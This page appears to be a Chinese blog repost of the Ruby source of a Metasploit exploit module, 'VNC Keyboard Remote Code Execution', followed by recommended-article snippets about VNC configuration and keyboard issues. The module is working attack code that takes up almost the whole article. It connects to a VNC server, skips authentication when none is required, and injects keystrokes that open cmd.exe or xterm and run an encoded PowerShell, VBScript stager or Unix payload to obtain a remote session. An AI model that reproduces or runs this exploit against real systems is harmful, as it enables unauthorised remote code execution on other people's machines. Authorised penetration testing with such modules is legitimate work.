VNC Keyboard Remote Code Execution

最新推荐文章于 2021-07-13 14:11:38 发布
最新推荐文章于 2021-07-13 14:11:38 发布
阅读量783 收藏
点赞数
文章标签: metasploit 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/rfb'

class Metasploit3 < Msf::Exploit::Remote

  Rank = GreatRanking
  WINDOWS_KEY = "\xff\xeb"
  ENTER_KEY = "\xff\x0d"

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'VNC Keyboard Remote Code Execution',
      'Description'     => %q{
        This module exploits VNC servers by sending virtual keyboard keys and executing
        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
        and a payload is typed and executed.
      },
      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
      'Privileged'      => false,
      'License'         => MSF_LICENSE,
      'Platform'       => %w{ win unix },
      'Targets'         =>
        [
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
        ],
      'DisclosureDate'  => 'Jul 10 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        Opt::RPORT(5900),
        OptString.new('PASSWORD', [ false, 'The VNC password']),
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
      ], self.class)
  end


  def press_key(key)
    keyboard_key = "\x04\x01" # Press key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def release_key(key)
    keyboard_key = "\x04\x00" # Release key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def exec_command(command)
    values = command.chars.to_a
    values.each do |value|
      press_key("\x00#{value}")
      release_key("\x00#{value}")
    end
    press_key(ENTER_KEY)
  end


  def start_cmd_prompt
    print_status("#{rhost}:#{rport} - Opening Run command")
    # Pressing and holding windows key for 1 second
    press_key(WINDOWS_KEY)
    Rex.select(nil, nil, nil, 1)
    # Press the "r" key
    press_key("\x00r")
    # Now we can release both keys again
    release_key("\x00r")
    release_key(WINDOWS_KEY)
    # Wait a second to open run command window
    select(nil, nil, nil, 1)
    exec_command('cmd.exe')
    # Wait a second for cmd.exe prompt to open
    Rex.select(nil, nil, nil, 1)
  end


  def exploit

    begin
      alt_key = "\xff\xe9"
      f2_key = "\xff\xbf"
      password = datastore['PASSWORD']

      connect
      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)

      unless vnc.handshake
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
      end

      if password.nil?
        print_status("#{rhost}:#{rport} - Bypass authentication")
        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
        sock.put("\x10")
      else
        print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
        if vnc.authenticate(password)
          print_status("#{rhost}:#{rport} - Authenticated")
        else
          fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
        end
      end

      # Send shared desktop
      unless vnc.send_client_init
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
      end

      if target.name =~ /VBScript CMDStager/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        execute_cmdstager({:flavor => :vbs, :linemax => 8100})
        # Exit the CMD prompt
        exec_command('exit')
      elsif target.name =~ /Powershell/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
        # Execute powershell payload and make sure we exit our CMD prompt
        exec_command("#{command} && exit")
      elsif target.name =~ /Linux/
        print_status("#{rhost}:#{rport} - Opening 'Run Application'")
        # Press the ALT key and hold it for a second
        press_key(alt_key)
        Rex.select(nil, nil, nil, 1)
        # Press F2 to start up "Run application"
        press_key(f2_key)
        # Release ALT + F2
        release_key(alt_key)
        release_key(f2_key)
        # Wait a second for "Run application" to start
        Rex.select(nil, nil, nil, 1)
        # Start a xterm window
        print_status("#{rhost}:#{rport} - Opening xterm")
        exec_command('xterm')
        # Wait a second for "xterm" to start
        Rex.select(nil, nil, nil, 1)
        # Execute our payload and exit (close) the xterm window
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        exec_command("nohup #{payload.encoded} &")
        exec_command('exit')
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")
      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)

        # Success! session is here!
        break if session_created?
      end

    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  def execute_command(cmd, opts = {})
    exec_command(cmd)
  end

end
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解决VNC有些键不能输入的问题
I am Peter Chen
03-07 1万+
今天ubuntu 12.04中安装了vnc server 不知咋搞的就没法输入p 之前安装也遇到不能输入d的事情 先看keyboard里的shortcuts,没有和p相关的 再看compizconfig也没有 sudo apt-get install compizconfig-settings-manager General -> General Options -> Key bind
如何在Ubuntu 20.04上安装和配置VNC
08-17 8318
介绍 (Introduction) Virtual Network Computing, or VNC, is a connection system that allows you to use your keyboard and mouse to interact with a graphical desktop environment on a remote server. It make...
Metasploit 魔鬼训练营》01 初识 Metasploit
kevinhanser
08-23 1635
1 . 使用 msf 图形化工具 armitage从 armitage 2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权 3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权 4 . 总结过程
Keyboard Mapping Problem on Tight VNC
weixin_30455067的博客
04-26 277
VNCviewer(xtightviewer) 登录 VNCServer(xtightcvncserver) 也不能正常工作,键盘映射是错误的,输入‘s',输出一个’e‘。xtight 自己的vncserver 和vncviewer 都能工作。 一个临时的解决办法是: <!--[endif]--> export XKL_XMODMAP_DISABL...
RH Linux配置VNCServer
Keyboard Knight
11-19 150
使用vncserver命令为当前用户启动vnc服务(将在当前用户主目录下生成.vnc配置文件夹)[root@tech ~]# vi .vnc/xstartup gnome-session &amp;   关闭服务器上自己的vnc连接vncserver -kill  :桌面号例如:关闭上面的vnc连接vncserver -kill  :1开机自动运行vncserver1.设置vncserver...
解除VNC的键盘禁用
无知是恶
08-29 7861
解除VNC的键盘禁用: 我们上课老师用的VNC,但是我发现alt+tab用不了不能切换后台很不方便,在网上找了好久也没解决办法,最后自己捣鼓出来了,具体步骤: 在空白处点击右键——&gt;options——&gt;advanced——&gt;input——&gt;pass special keys勾掉,然后就行了哈哈...
Orange's动手写操作系统-----------第一篇:nasm,bochs环境配置(学习笔记1)
[每一个你讨厌的现在,都有一个不够努力的曾经_...._]
11-17 3912
找完工作,开始学习orange's自己动手写操作系统,希望能够坚持,现在的目标就是好好学习,加油~~~ 1:安装nasm汇编编译器:网站下载:http://sourceforge.net/projects/nasm,目前最新版本是,nasm-2.06.tar.gz     源码安装:     ~$./configure     ~$make     ~$sudo make install
QEMU 使用手册(英文)
Tangent's blog
06-14 2661
获取方法: man qemu|multimarkdown>qemu-manual.html 手册内容: QEMU(1) QEMU QEMU(1) NAME qemu - QEMU User Documentation SYNOPSIS qemu-system-x86_64 [options] [disk_image] DESCRIPTION The QEMU PC System emulator simulates the following peripherals: • i440FX host P
Android内核的编译和调试
墨鱼菜鸡
04-28 801
本文博客地址:http://blog.csdn.net/qq1084283172/article/details/70500488 一、Android内核源码的选择 Android手机设备内核源码的调试需要外部硬件设备的支持,调试步骤比较麻烦。相对来说,Android模拟器内核源码的调试就比较简单了,这里...
Xen v3.0 用户手册
JDMBA的专栏
11-08 7382
       1. Introduction(介绍) Xen is an open-source para-virtualizing virtual machine monitor (VMM), or ``hypervisor, for the x86 processor architecture. Xen can securely execute multiple virtual m
Qt: XKEYBOARD extension not present on the X server.的解决方法
bianxuewei1238的博客
10-30 1万+
最近在服务器上用qtcreator改代码,发现无法用键盘键入任何东西,然后发现在终端会报出这样一行东西: Qt: XKEYBOARD extension not present on the X server. 查了很多东西,发现这就是问题所在。 至于怎么改,有说要改.bashrc的,具体需要添加以下两行代码: export XKB_DEFAULT_RULES=base export ...
VNC连接成功黑屏的原因深究
热门推荐
sinat_34780035的博客
01-19 2万+
新弄了一个服务器,安装各种服务,装VNC遇到问题,黑屏,百度之,网上流传的大部分是基于gnome的桌面配置的,如http://blog.csdn.net/lymemoryzz/article/details/50669566除了VNC出现问题,还可以考虑dao是gnome等linux桌面的问题,当时我查看oracle linux默认是有gnome于是直接按这个配置,结果一直没好,然后从头安装配置s
通过 RDP、SSH、VNC 进行远程控制
keyboard专栏
07-13 2419
VNC VNC(Virtual Network Computing )是一种图形化的桌面共享系统,它使用远程帧缓冲协议 (RFB) 来远程控制另一台计算机。它将键盘和鼠标事件从一台计算机传输到另一台计算机,通过网络向另一个方向转发图形屏幕更新。 优点: 1、VNC是平台无关的—— 有多种客户端和服务器的实现,几乎涵盖了所有的主流平台。甚至一些VNC的实现被称“无客户端”,这是因为不需要安装插件或客户端软件而,而是依靠HTML5技术,只需要一个浏览器就可以访问远程桌面了。 2、VNC 是开源的—— VNC最初
vnc 键盘慢_在基于Web的VNC应用程序中支持多种键盘布局
cuyi7076的博客
06-22 790
诸如Kimchi和Ovirt之类的基于Web的KVM管理工具可帮助用户轻松创建和管理虚拟机(VM),甚至可以从移动设备进行管理。 此类工具依赖于虚拟桌面计算 (VNC)等远程桌面共享技术,而使用VNC的工具则需要基于Web的VNC客户端,例如noVNCVNC的最初目标是使物理PC可以远程访问。 因为虚拟化不是VNC的问题,所以将VNC与VM一起使用时,对键击的解释和操作需要特殊处理。...
HTML5宠爱有家网站模板.zip
09-06
页面数量:1页 网页主题:宠物网站模板、产品介绍、官网模板、网站模板 网页页面:首页、关于我们、相关服务、团队介绍、宠物博客、宠物照片墙、在线留言 页面实现元素:导航 、轮播图、图文列表、图片遮罩层、图片切换、 按钮悬停、图片列表、图片悬停、文字列表、表单、底部快速导航、回到顶部 实现技术:HTML、CSS 、JQuery
LM324设计的LED电平指示器电路图技术资料开发设计用的重要资料.zip
最新发布
09-06
LM324设计的LED电平指示器电路图技术资料开发设计用的重要资料.zip
springboot游戏分享网站
09-06
网络的广泛应用给生活带来了十分的便利。所以把游戏分享管理与现在网络相结合,利用java技术建设游戏分享网站,实现游戏分享的信息化。则对于进一步提高游戏分享管理发展,丰富游戏分享管理经验能起到不少的促进作用。 游戏分享网站能够通过互联网得到广泛的、全面的宣传,让尽可能多的用户了解和熟知游戏分享网站的便捷高效,不仅为群众提供了服务,而且也推广了自己,让更多的群众了解自己。对于游戏分享而言,若拥有自己的系统,通过系统得到更好的管理,同时提升了形象。 本系统设计的现状和趋势,从需求、结构、数据库等方面的设计到系统的实现,分别为管理员和用户的实现。论文的内容从系统的设计、描述、实现、分析、测试方面来表明开发的过程。本系统根据现实情况来选择一种可行的开发方案,借助java编程语言和MySQL数据库等实现系统的全部功能,接下来对系统进行测试,测试系统是否有漏洞和测试用户权限来完善系统,最终系统完成达到相关标准。
8051Proteus仿真c源码位定义的输入输出控制
09-06
8051Proteus仿真c源码位定义的输入输出控制提取方式是百度网盘分享地址
vnc viewer - remote desktop apk
11-05
VNC Viewer - Remote Desktop APK 是一款功能强大的远程桌面应用程序。它允许用户通过安卓设备远程访问和控制其他计算机的桌面界面。这款应用程序基于VNC(Virtual Network Computing)技术,通过网络连接将用户的设备与目标计算机进行沟通。 使用 VNC Viewer - Remote Desktop APK,用户可以在任何地方轻松访问他们的计算机。无论是在家、在办公室还是在旅途中,只需通过安卓设备连接到网络,即可直接进入远程计算机的桌面界面。这对于需要远程工作、处理文件、访问个人文件或远程支持他人的人来说非常方便。 除了远程访问,VNC Viewer - Remote Desktop APK 还具有许多实用的功能。用户可以通过触摸屏幕进行鼠标和键盘输入,完全模拟物理输入设备。此外,用户还可以实时查看和控制远程计算机的屏幕,交流和操作变得非常直观和效率。 该应用程序支持高级的安全加密机制,使用户可以安全地连接到远程计算机,确保数据传输的保密性和完整性。此外,VNC Viewer - Remote Desktop APK 还可以根据用户的网络情况进行调整,以优化连接速度和性能。 总的来说,VNC Viewer - Remote Desktop APK 是一款方便实用的远程桌面应用程序。它为用户提供了灵活的远程访问和控制选项,并具有高级的安全性和性能优化功能。无论是个人使用还是商业用途,这款应用程序都能为用户提供便利和效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值